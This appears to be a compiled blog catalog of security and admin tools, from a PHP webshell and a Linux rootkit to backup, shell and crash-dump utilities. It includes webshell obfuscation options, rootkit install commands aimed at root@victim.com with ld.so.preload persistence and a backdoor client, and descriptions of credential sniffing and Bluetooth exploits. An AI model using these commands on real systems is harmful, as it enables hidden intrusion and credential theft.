  • Search for malware samples in a progressively growing malware repository.
The basic functionalities can be extended to:
  • Download malware samples (15 samples/day for registered users and 100 samples/day for premium users);
  • Perform confidential malware analysis (reserved for premium users)

Malware analysis process

The malware analysis process is kept as easy and intuitive as possible for AVCaesar users:
  • Submit suspicious file via AVCaesar web interface. Premium users can choose to perform a confidential analysis.
  • Receive a well-structured malware analysis report.



B374K - PHP Webshell with handy features


This PHP shell is a useful tool for system or web administrators to do remote management without using cPanel or connecting via SSH, FTP, etc. All actions take place within a web browser.

Features :
  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach local file on server)
  • String conversion
  • All of that only in 1 file, no installation needed
  • Support PHP > 4.3.3 and PHP 5

Requirements :
  • PHP version > 4.3.3 and PHP 5
  • As it uses zepto.js v1.1.2, you need a modern browser to use the b374k shell. See browser support on the zepto.js website http://zeptojs.com/
  • Responsibility of what you do with this shell

Installation :
Download b374k.php (default password: b374k), edit it to change the password (stored in sha1(md5()) format) and upload b374k.php to your server. Or create your own b374k.php, as explained below.

Customize :
After you have finished editing the files, upload index.php, base, module, theme and all files inside them to a server
Using Web Browser :
Open index.php in your browser; quick run will only run the shell. Use the packer to pack all files into a single PHP file. Set all the available options and the output file will be written to the same directory as index.php
Using Console :
$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             save as filename
        -p password                             protect with password
        -t theme                                theme to use
        -m modules                              modules to pack separated by comma
        -s                                      strip comments and whitespaces
        -b                                      encode with base64
        -z [no|gzdeflate|gzencode|gzcompress]   compression (use only with -b)
        -c [0-9]                                level of compression
        -l                                      list available modules
        -k                                      list available themes
example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9
Don't forget to delete index.php, base, module, theme and all files inside them after you have finished, because they are not password-protected and can be a security threat to your server.


Download B374K

Babun - A Windows shell you will love!


Would you like to use a Linux-like console on a Windows host without a lot of fuss? Try out babun!

Installation

Just download the dist file from http://babun.github.io, unzip it and run the install.bat script. After a few minutes babun starts automatically. The application will be installed to the %USER_HOME%\.babun directory. Use the /target option to install babun to a custom directory.

Features in 10 seconds

Babun features the following:
  • Pre-configured Cygwin with a lot of addons
  • Silent command-line installer, no admin rights required
  • pact - advanced package manager (like apt-get or yum)
  • xTerm-256 compatible console
  • HTTP(s) proxying support
  • Plugin-oriented architecture
  • Pre-configured git and shell
  • Integrated oh-my-zsh
  • Auto update feature
  • "Open Babun Here" context menu entry

Features in 3 minutes

Cygwin

The core of Babun consists of a pre-configured Cygwin. Cygwin is a great tool, but there are a lot of quirks and tricks that make you lose a lot of time before it is actually usable. Not only does babun solve most of these problems, it also contains a lot of vital packages, so that you can be productive from the very first minute.

Package manager

Babun provides a package manager called pact. It is similar to apt-get or yum. Pact enables installing/searching/upgrading and deinstalling cygwin packages with no hassle at all. Just invoke pact --help to check how to use it.

Shell

Babun’s shell is tweaked in order to provide the best possible user-experience. There are two shell types that are pre-configured and available right away - bash and zsh (zsh is the default one). Babun’s shell features:
  • syntax highlighting
  • UNIX tools
  • software development tools
  • git-aware prompt
  • custom scripts and aliases
  • and much more!

Console

Mintty is the console used in babun. It features an xterm-256 mode, nice fonts and simply looks great!

Proxying

Babun supports HTTP proxying out of the box. Just add the address and the credentials of your HTTP proxy server to the .babunrc file located in your home folder and execute source .babunrc to enable HTTP proxying. SOCKS proxies are not supported for now.

Developer tools

Babun provides many packages, convenience tools and scripts that make your life much easier. The long list of features includes:
  • programming languages (Python, Perl, etc.)
  • git (with a wide variety of aliases and tweaks)
  • UNIX tools (grep, wget, curl, etc.)
  • vcs (svn, git)
  • oh-my-zsh
  • custom scripts (pbcopy, pbpaste, babun, etc.)

Plugin architecture

Babun has a very small microkernel (cygwin, a couple of bash scripts and a bit of convention) and a plugin architecture on top of it. It means that almost everything is a plugin in babun's world! Not only does it structure babun in a clean way, it also enables others to contribute small chunks of code. Currently, babun comprises the following plugins:
  • cacert
  • core
  • git
  • oh-my-zsh
  • pact
  • cygdrive
  • dist
  • shell

Auto-update

Self-update is at the very heart of babun! Many Cygwin tools are simple bash scripts: once you install them there is no smooth way of getting a newer version. You either delete the older version or overwrite it with the newest one, losing all the changes you have made in between.
Babun contains an auto-update feature which enables updating the microkernel, the plugins and even the underlying cygwin. Files located in your home folder will never be deleted or overwritten, which preserves your local config and customizations.

Installer

Babun features a silent command-line installation script that may be executed without admin rights on any Windows host.

Using babun

Setting up proxy

To set up a proxy, uncomment the following lines in the .babunrc file (%USER_HOME%\.babun\cygwin\home\USER\.babunrc):
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost

Setting up git

Babun has a pre-configured git. The only thing you should do after the installation is to add your name and email to the git config:
git config --global user.name "your name"
git config --global user.email "your@email.com"
There’s a lot of great git aliases provided by the git plugin:
gitalias['alias.cp']='cherry-pick'
gitalias['alias.st']='status -sb'
gitalias['alias.cl']='clone'
gitalias['alias.ci']='commit'
gitalias['alias.co']='checkout'
gitalias['alias.br']='branch'
gitalias['alias.dc']='diff --cached'
gitalias['alias.lg']="log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %Cblue<%an>%Creset' --abbrev-commit --date=relative --all"
gitalias['alias.last']='log -1 --stat'
gitalias['alias.unstage']='reset HEAD --'

Installing and removing packages

Babun is shipped with pact, a Linux-like package manager. It uses the cygwin repository for downloading packages:
{ ~ } » pact install arj                                                                     ~
Working directory is /setup
Mirror is http://mirrors.kernel.org/sourceware/cygwin/
setup.ini taken from the cache

Installing arj
Found package arj
--2014-03-30 19:34:38--  http://mirrors.kernel.org/sourceware/cygwin//x86/release/arj/arj-3.10.22-1.tar.bz2
Resolving mirrors.kernel.org (mirrors.kernel.org)... 149.20.20.135, 149.20.4.71, 2001:4f8:1:10:0:1994:3:14, ...
Connecting to mirrors.kernel.org (mirrors.kernel.org)|149.20.20.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189944 (185K) [application/x-bzip2]
Saving to: `arj-3.10.22-1.tar.bz2'

100%[=======================================>] 189,944      193K/s   in 1.0s

2014-03-30 19:34:39 (193 KB/s) - `arj-3.10.22-1.tar.bz2' saved [189944/189944]

Unpacking...
Package arj installed
Here’s the list of all pact’s features:
{ ~ }  » pact --help
pact: Installs and removes Cygwin packages.

Usage:
  "pact install <package names>" to install given packages
  "pact remove <package names>" to remove given packages
  "pact update <package names>" to update given packages
  "pact show" to show installed packages
  "pact find <patterns>" to find packages matching patterns
  "pact describe <patterns>" to describe packages matching patterns
  "pact packageof <commands or files>" to locate parent packages
  "pact invalidate" to invalidate pact caches (setup.ini, etc.)
Options:
  --mirror, -m <url> : set mirror
  --invalidate, -i       : invalidates pact caches (setup.ini, etc.)
  --force, -f : force the execution
  --help
  --version

Changing the default shell

zsh (with oh-my-zsh) is babun's default shell.
Executing the following command will output your default shell:
{ ~ } » babun shell                                                                          ~
/bin/zsh
In order to change your default shell execute:
{ ~ } » babun shell /bin/bash                                                                ~
/bin/zsh
/bin/bash
The output contains two lines: the previous default shell and the new default shell

Checking the configuration

Execute the following command to check the configuration:
{ ~ }  » babun check                                                                         ~
Executing babun check
Prompt speed      [OK]
Connection check  [OK]
Update check      [OK]
Cygwin check      [OK]
By executing this command you can also check whether there is a newer cygwin version available:
{ ~ }  » babun check                                                                            ~
Executing babun check
Prompt speed      [OK]
Connection check  [OK]
Update check      [OK]
Cygwin check      [OUTDATED]
Hint: the underlying Cygwin kernel is outdated. Execute 'babun update' and follow the instructions!
It will check if there are problems with the speed of the git prompt, if there’s access to the Internet or finally if you are running the newest version of babun.
The command will output hints if problems occur:
{ ~ } » babun check                                                                          ~
Executing babun check
Prompt speed      [SLOW]
Hint: your prompt is very slow. Check the installed 'BLODA' software.
Connection check  [OK]
Update check      [OK]
Cygwin check      [OK]
On each startup, but only every 24 hours, babun will execute this check automatically. You can disable the automatic check in the ~/.babunrc file.

Tweaking the configuration

You can tweak some config options in the ~/.babunrc file. Here’s the full list of variables that may be modified:
# JVM options
export JAVA_OPTS="-Xms128m -Xmx256m"

# Modify these lines to set your locale
export LANG="en_US.UTF-8"
export LC_CTYPE="en_US.UTF-8"
export LC_ALL="en_US.UTF-8"

# Uncomment these lines to the set your machine's default locale (and comment out the UTF-8 ones)
# export LANG=$(locale -uU)
# export LC_CTYPE=$(locale -uU)
# export LC_ALL=$(locale -uU)

# Uncomment this to disable daily auto-update & proxy checks on startup (not recommended!)
# export DISABLE_CHECK_ON_STARTUP="true"

# Uncomment to increase/decrease the check connection timeout
# export CHECK_TIMEOUT_IN_SECS=4

# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost

Updating babun

To update babun to the newest version execute:
babun update
Please note that your local configuration files will not be overwritten.
The babun update command will also update the underlying cygwin version if a newer version is available. In that case babun will download the new cygwin installer, close itself and start the cygwin installation process. Once the cygwin installation is completed, babun will restart.

Screenshots

The following screenshots (captions only; images not included here):
  • Startup screen
  • Pact - package installation
  • Pact - package installed
  • Babun oh-my-zsh - auto-update
  • VIM syntax highlighting
  • Nano syntax highlighting
  • Git aliases - git lg
  • Git aliases - git st
  • Shell prompt
  • Babun update
  • Open Babun here - Context Menu

Download Babun

BackBox Linux 4.2 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. It is designed to be fast, easy to use and to provide a minimal yet complete desktop environment; thanks to its own software repositories, it is always updated to the latest stable version of the most used and best known ethical hacking tools.

The BackBox Team is pleased to announce the updated release of BackBox Linux, the version 4.2! This release includes features such as Linux Kernel 3.16 and Ruby 2.1.

What's new
  • Preinstalled Linux Kernel 3.16
  • New Ubuntu 14.04.2 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: beef-project, crunch, fang, galleta, jd-gui, metasploit-framework, pasco, pyew, rifiuti2, setoolkit, theharvester, tor, torsocks, volatility, weevely, whatweb, wpscan, xmount, yara, zaproxy
System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Download BackBox Linux 4.2

BackBox Linux 4.3 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. It is designed to be fast, easy to use and to provide a minimal yet complete desktop environment; thanks to its own software repositories, it is always updated to the latest stable version of the most used and best known ethical hacking tools.

What's new
  • Preinstalled Linux Kernel 3.16
  • New Ubuntu 14.04.2 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: beef-project, btscanner, dirs3arch, metasploit-framework, ophcrack, setoolkit, tor, weevely, wpscan, etc.

System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-utopic linux-headers-generic-lts-utopic linux-signed-image-generic-lts-utopic
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge


Download BackBox Linux 4.3

BackBox Linux 4.4 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. It is designed to be fast, easy to use and to provide a minimal yet complete desktop environment; thanks to its own software repositories, it is always updated to the latest stable version of the most used and best known ethical hacking tools.

This release includes some special new features to keep BackBox up to date with the latest developments in the security world. Tools such as OpenVAS and Automotive Analysis will make a big difference. BackBox 4.4 also comes with Kernel 3.19.

What's new
  • Preinstalled Linux Kernel 3.19
  • New Ubuntu 14.04.3 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Automotive Analysis category
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: apktool, armitage, beef-project, can-utils, dex2jar, fimap, jd-gui, metasploit-framework, openvas, setoolkit, sqlmap, tor, weevely, wpscan, zaproxy, etc.

System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-vivid linux-headers-generic-lts-vivid linux-signed-image-generic-lts-vivid
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge
sudo apt-get install openvas sqlite3
sudo openvas-launch sync
sudo openvas-launch start


Download BackBox Linux 4.4

Bacula - Network Backup Tool for Linux, Unix, Mac, and Windows


Bacula is a set of computer programs that permits the system administrator to manage backup, recovery, and verification of computer data across a network of computers of different kinds. Bacula can also run entirely on a single computer and can back up to various types of media, including tape and disk.

In technical terms, it is a network Client/Server based backup program. Bacula is relatively easy to use and efficient, while offering many advanced storage management features that make it easy to find and recover lost or damaged files. Due to its modular design, Bacula is scalable from small single computer systems to systems consisting of hundreds of computers located over a large network.

Who Needs Bacula?

If you are currently using a program such as tar, dump, or bru to backup your computer data, and you would like a network solution, more flexibility, or catalog services, Bacula will most likely provide the additional features you want. However, if you are new to Unix systems or do not have offsetting experience with a sophisticated backup package, the Bacula project does not recommend using Bacula as it is much more difficult to setup and use than tar or dump.

If you want Bacula to behave like the above mentioned simple programs and write over any tape that you put in the drive, then you will find working with Bacula difficult. Bacula is designed to protect your data following the rules you specify, and this means reusing a tape only as the last resort. It is possible to “force” Bacula to write over any tape in the drive, but it is easier and more efficient to use a simpler program for that kind of operation.

If you would like a backup program that can write to multiple volumes (i.e. is not limited by your tape drive capacity), Bacula can most likely fill your needs. In addition, quite a number of Bacula users report that Bacula is simpler to setup and use than other equivalent programs.

If you are currently using a sophisticated commercial package such as Legato Networker, ARCserveIT, Arkeia, or PerfectBackup+, you may be interested in Bacula, which provides many of the same features and is free software available under the GNU Version 2 software license.

Bacula Components or Services

Bacula is made up of the following five major components or services: Director, Console, File, Storage, and Monitor services.

Bacula Director

The Bacula Director service is the program that supervises all the backup, restore, verify and archive operations. The system administrator uses the Bacula Director to schedule backups and to recover files. For more details see the Director Services Daemon Design Document in the Bacula Developer’s Guide. The Director runs as a daemon (or service) in the background.

Bacula Console

The Bacula Console service is the program that allows the administrator or user to communicate with the Bacula Director. Currently, the Bacula Console is available in three versions: a text-based console interface, a QT-based interface, and a wxWidgets graphical interface. The first and simplest is to run the Console program in a shell window (i.e. a TTY interface). Most system administrators will find this completely adequate. The second version is a GNOME GUI interface that is far from complete, but quite functional as it has most of the capabilities of the shell Console. The third version is a wxWidgets GUI with an interactive file restore. It also has most of the capabilities of the shell console, allows command completion with tabulation, and gives you instant help about the command you are typing. For more details see the Bacula Console Design Document.

Bacula File

The Bacula File service (also known as the Client program) is the software program that is installed on the machine to be backed up. It is specific to the operating system on which it runs and is responsible for providing the file attributes and data when requested by the Director. The File services are also responsible for the file system dependent part of restoring the file attributes and data during a recovery operation. For more details see the File Services Daemon Design Document in the Bacula Developer’s Guide. This program runs as a daemon on the machine to be backed up. In addition to Unix/Linux File daemons, there is a Windows File daemon (normally distributed in binary format). The Windows File daemon runs on current Windows versions (NT, 2000, XP, 2003, and possibly Me and 98).

Bacula Storage

The Bacula Storage services consist of the software programs that perform the storage and recovery of the file attributes and data to the physical backup media or volumes. In other words, the Storage daemon is responsible for reading and writing your tapes (or other storage media, e.g. files). For more details see the Storage Services Daemon Design Document in the Bacula Developer's Guide. The Storage services run as a daemon on the machine that has the backup device (usually a tape drive).

Catalog

The Catalog services are comprised of the software programs responsible for maintaining the file indexes and volume databases for all files backed up. The Catalog services permit the system administrator or user to quickly locate and restore any desired file. The Catalog services set Bacula apart from simple backup programs like tar and bru, because the catalog maintains a record of all Volumes used, all Jobs run, and all Files saved, permitting efficient restoration and Volume management. Bacula currently supports three different databases, MySQL, PostgreSQL, and SQLite, one of which must be chosen when building Bacula.
The three SQL databases currently supported (MySQL, PostgreSQL or SQLite) provide quite a number of features, including rapid indexing, arbitrary queries, and security. Although the Bacula project plans to support other major SQL databases, the current Bacula implementation interfaces only to MySQL, PostgreSQL and SQLite. For the technical and porting details see the Catalog Services Design Document in the Developer's Guide.
The packages for MySQL and PostgreSQL are available for several operating systems. Alternatively, installing from source is quite easy; see the Installing and Configuring MySQL chapter of the Bacula documentation for the details. For more information on MySQL, please see http://www.mysql.com. Or see the Installing and Configuring PostgreSQL chapter for the details. For more information on PostgreSQL, please see http://www.postgresql.org.
Configuring and building SQLite is even easier. For the details of configuring SQLite, please see the Installing and Configuring SQLite chapter of the Bacula documentation.

Bacula Monitor

A Bacula Monitor service is the program that allows the administrator or user to watch the current status of Bacula Directors, Bacula File Daemons and Bacula Storage Daemons. Currently, only a GTK+ version is available, which works with GNOME, KDE, or any window manager that supports the FreeDesktop.org system tray standard.
To perform a successful save or restore, the following four daemons must be configured and running: the Director daemon, the File daemon, the Storage daemon, and the Catalog service (MySQL, PostgreSQL or SQLite).


Download Bacula

Beeswarm - Active IDS made easy


Beeswarm is an active IDS project that provides easy configuration, deployment and management of honeypots and clients. The system operates by luring the attacker into the honeypots: it sets up a deception infrastructure in which deployed drones communicate with honeypots and intentionally leak credentials while doing so. The project has been released in a beta version; a stable version is expected within three months.

Installing and starting the server

On the VM to be set up as the server, perform the following steps. Make sure to write down the administrative password.

$ sudo apt-get install libffi-dev build-essential python-dev python-pip libssl-dev libxml2-dev libxslt1-dev
$ pip install pydes --allow-external pydes --allow-unverified pydes
$ pip install beeswarm
Downloading/unpacking beeswarm
...
Successfully installed Beeswarm
Cleaning up...
$ mkdir server_workdir
$ cd server_workdir/
$ beeswarm --server
...
****************************************************************************
Default password for the admin account is: uqbrlsabeqpbwy
****************************************************************************
...


Download Beeswarm

BetterCap - A complete, modular, portable and easily extensible MITM framework


BetterCap is an attempt to create a complete, modular, portable and easily extensible MITM framework with every kind of feature that could be needed while performing a man-in-the-middle attack.
It's currently able to sniff and print the following information from the network:
  • URLs being visited.
  • HTTPS host being visited.
  • HTTP POSTed data.
  • FTP credentials.
  • IRC credentials.
  • POP, IMAP and SMTP credentials.
  • NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.

DEPENDS
  • colorize (gem install colorize)
  • packetfu (gem install packetfu)
  • pcaprub (gem install pcaprub) [sudo apt-get install ruby-dev libpcap-dev]

Beurk - Experimental Unix Rootkit

BEURK is a userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
NOTE: BEURK is a recursive acronym for BEURK Experimental Unix RootKit

Features
  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp )
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features
  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage
  • Compile
    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
  • Install
    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Enjoy !
    ./client.py victim_ip:port # connect with furtive backdoor

Dependencies
The following packages are not required in order to build BEURK at the moment:
  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection
Example on debian:
    apt-get install libpcap-dev libpam-dev libssl-dev


Download Beurk

BlackArch Linux v2015.07.31 - Penetration Testing Distribution


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1239 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

The new ISOs include over 1230 tools for i686 and x86_64 and over 1010 tools. For more details see the ChangeLog below.                             

Changelog v2015.07.31
  • added more than 30 new tools
  • updated system packages including linux kernel 4.1.3
  • updated all tools
  • added new color config for vim
  • replace splash.png
  • deleted blackarch-install.txt
  • updated /root/README
  • fixed typos in ISO config files


BlackArch Linux v2015.11.24 - Penetration Testing Distribution


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1308 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

The BlackArch Live ISO contains multiple window managers.

ChangeLog v2015.11.24:
  • added more than 100 new tools
  • updated system packages
  • include linux kernel 4.2.5
  • updated all tools
  • updated menu entries for window managers
  • added (correct) multilib support
  • added more fonts
  • added missing group 'vboxsf'

Download BlackArch Linux v2015.11.24

Blackbone - Windows Memory Hacking Library


Features
  • x86 and x64 support
  • Process interaction
    • Manage PEB32/PEB64
    • Manage process through WOW64 barrier
  • Process Memory
    • Allocate and free virtual memory
    • Change memory protection
    • Read/Write virtual memory
  • Process modules
    • Enumerate all (32/64 bit) modules loaded. Enumerate modules using Loader list/Section objects/PE headers methods.
    • Get exported function address
    • Get the main module
    • Unlink module from loader lists
    • Inject and eject modules (including pure IL images)
    • Inject 64bit modules into WOW64 processes
    • Manually map native PE images
  • Threads
    • Enumerate threads
    • Create and terminate threads. Support for cross-session thread creation.
    • Get thread exit code
    • Get main thread
    • Manage TEB32/TEB64
    • Join threads
    • Suspend and resume threads
    • Set/Remove hardware breakpoints
  • Pattern search
    • Search for arbitrary pattern in local or remote process
  • Remote code execution
    • Execute functions in remote process
    • Assemble own code and execute it remotely
    • Support for cdecl/stdcall/thiscall/fastcall conventions
    • Support for arguments passed by value, pointer or reference, including structures
    • FPU types are supported
    • Execute code in new thread or any existing one
  • Remote hooking
    • Hook functions in remote process using int3 or hardware breakpoints
    • Hook functions upon return
  • Manual map features
    • x86 and x64 image support
    • Mapping into any arbitrary unprotected process
    • Section mapping with proper memory protection flags
    • Image relocations (only 2 types supported. I haven't seen a single PE image with some other relocation types)
    • Imports and Delayed imports are resolved
    • Bound import is resolved as a side effect, I think
    • Module exports
    • Loading of forwarded export images
    • Api schema name redirection
    • SxS redirection and isolation
    • Activation context support
    • Dll path resolving similar to native load order
    • TLS callbacks. Only for one thread and only with PROCESS_ATTACH/PROCESS_DETACH reasons.
    • Static TLS
    • Exception handling support (SEH and C++)
    • Adding module to some native loader structures(for basic module api support: GetModuleHandle, GetProcAdress, etc.)
    • Security cookie initialization
    • C++/CLI images are supported
    • Image unloading
    • Increase reference counter for import libraries in case of manual import mapping
    • Cyclic dependencies are handled properly
  • Driver features
    • Allocate/free/protect user memory
    • Read/write user and kernel memory
    • Disable permanent DEP for WOW64 processes
    • Change process protection flag
    • Change handle access rights
    • Remap process memory
    • Hiding allocated user-mode memory
    • User-mode dll injection and manual mapping
    • Manual mapping of drivers

Download Blackbone

BlueMaho - Bluetooth Security Testing Suite


BlueMaho is a GUI shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written in Python, and uses wxPython. It can be used for testing BT devices for known vulnerabilities and, the main goal, testing to find unknown vulnerabilities. It can also produce nice statistics.

What it can do? (features)
  • scan for devices, show advanced info, SDP records, vendor etc
  • track devices - show where and how much times device was seen, its name changes
  • loop scan - it can scan all time, showing you online devices
  • alerts with sound if new device found
  • on_new_device - you can specify what command it should run when it finds a new device
  • it can use separate dongles - one for scanning (loop scan) and one for running tools or exploits
  • send files
  • change name, class, mode, BD_ADDR of local HCI devices
  • save results in database
  • form nice statistics (unique devices by day/hour, vendors, services etc)
  • test remote device for known vulnerabilities (see exploits for more details)
  • test remote device for unknown vulnerabilities (see tools for more details)
  • themes! you can customize it

What tools and exploits does it consist of?
  • Tools:
    • atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
    • bccmd by Marcel Holtmann
    • bdaddr.c by Marcel Holtmann
    • bluetracker.py by smiley
    • carwhisperer v0.2 by Martin Herfurt
    • psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
    • BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
    • btftp v0.1 by Marcel Holtmann
    • btobex v0.1 by Marcel Holtmann
    • greenplaque v1.5 by digitalmunition.com
    • L2CAP packetgenerator by Bastian Ballmann
    • obex stress tests 0.1
    • redfang v2.50 by Ollie Whitehouse
    • ussp-push v0.10 by Davide Libenzi
  • Exploits/attacks:
    • Bluebugger v0.1 by Martin J. Muench
    • bluePIMp by Kevin Finisterre
    • BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
    • helomoto by Adam Laurie
    • hidattack v0.1 by Collin R. Mulliner
    • Mode 3 abuse attack
    • Nokia N70 l2cap packet DoS PoC by Pierre Betouin
    • opush abuse (prompts flood) DoS attack
    • Sony-Ericsson reset display PoC by Pierre Betouin
  • you can add your own tools by editing 'exploits/exploits.lst' and 'tools/tools.lst'

Requirements
  • OS (tested with Debian 4.0 Etch / 2.6.18)
  • python (python 2.4 http://www.python.org)
  • wxPython (python-wxgtk2.6 http://www.wxpython.org)
  • BlueZ (3.9/3.24) http://www.bluez.org
  • Eterm to open tools somewhere, you can set another term in 'config/defaul.conf' changing the value of 'cmd_term' variable. (tested with 1.1 ver)
  • pkg-config(0.21), 'tee' used in tools/showmaxlocaldevinfo.sh, openobex, obexftp
  • libopenobex1 + libopenobex-dev (needed by ussp-push)
  • libxml2, libxml2-dev (needed by btftp)
  • libusb-dev (needed by bccmd)
  • libreadline5-dev (needed by atshell.c)
  • lightblue-0.3.3 (needed by obexstress.py)
  • hardware: any bluez compatible bluetooth-device 

BlueScreenView - Blue Screen of Death (STOP error) information in dump files


BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver or module that possibly caused the crash (filename, product name, file description, and file version).

For each crash displayed in the upper pane, you can view the details of the device drivers loaded during the crash in the lower pane. BlueScreenView also marks the drivers whose addresses were found in the crash stack, so you can easily locate the suspected drivers that possibly caused the crash.

Features
  • Automatically scans your current minidump folder and displays the list of all crash dumps, including crash dump date/time and crash details.
  • Allows you to view a blue screen which is very similar to the one that Windows displayed during the crash.
  • BlueScreenView enumerates the memory addresses inside the stack of the crash, and finds all drivers/modules that might be involved in the crash.
  • BlueScreenView also allows you to work with another instance of Windows, simply by choosing the right minidump folder (In Advanced Options).
  • BlueScreenView automatically locates the drivers that appear in the crash dump, and extracts their version resource information, including product name, file version, company, and file description.

Using BlueScreenView

BlueScreenView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - BlueScreenView.exe

After running BlueScreenView, it automatically scans your MiniDump folder and displays all crash details in the upper pane.

Crashes Information Columns (Upper Pane)
  • Dump File: The MiniDump filename that stores the crash data.
  • Crash Time: The created time of the MiniDump filename, which also matches to the date/time that the crash occurred.
  • Bug Check String: The crash error string. This error string is determined according to the Bug Check Code, and it's also displayed in the blue screen window of Windows.
  • Bug Check Code: The bug check code, as displayed in the blue screen window.
  • Parameter 1/2/3/4: The 4 crash parameters that are also displayed in the blue screen of death.
  • Caused By Driver: The driver that probably caused this crash. BlueScreenView tries to locate the right driver or module that caused the blue screen by looking inside the crash stack. However, be aware that the driver detection mechanism is not 100% accurate, and you should also look in the lower pane, which displays all drivers/modules found in the stack. These drivers/modules are marked in pink color.
  • Caused By Address: Similar to the 'Caused By Driver' column, but also displays the relative address of the crash.
  • File Description: The file description of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • Product Name: The product name of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • Company: The company name of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • File Version: The file version of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • Crash Address: The memory address at which the crash occurred (the address in the EIP/RIP processor register). In some crashes, this value might be identical to the 'Caused By Address' value, while in others, the crash address is different from the driver that caused the crash.
  • Stack Address 1 - 3: The last 3 addresses found in the call stack. Be aware that in some crashes, these values will be empty. Also, the stack addresses list is currently not supported for 64-bit crashes.

Drivers Information Columns (Lower Pane)
  • Filename: The driver/module filename
  • Address In Stack: The memory address of this driver that was found in the stack.
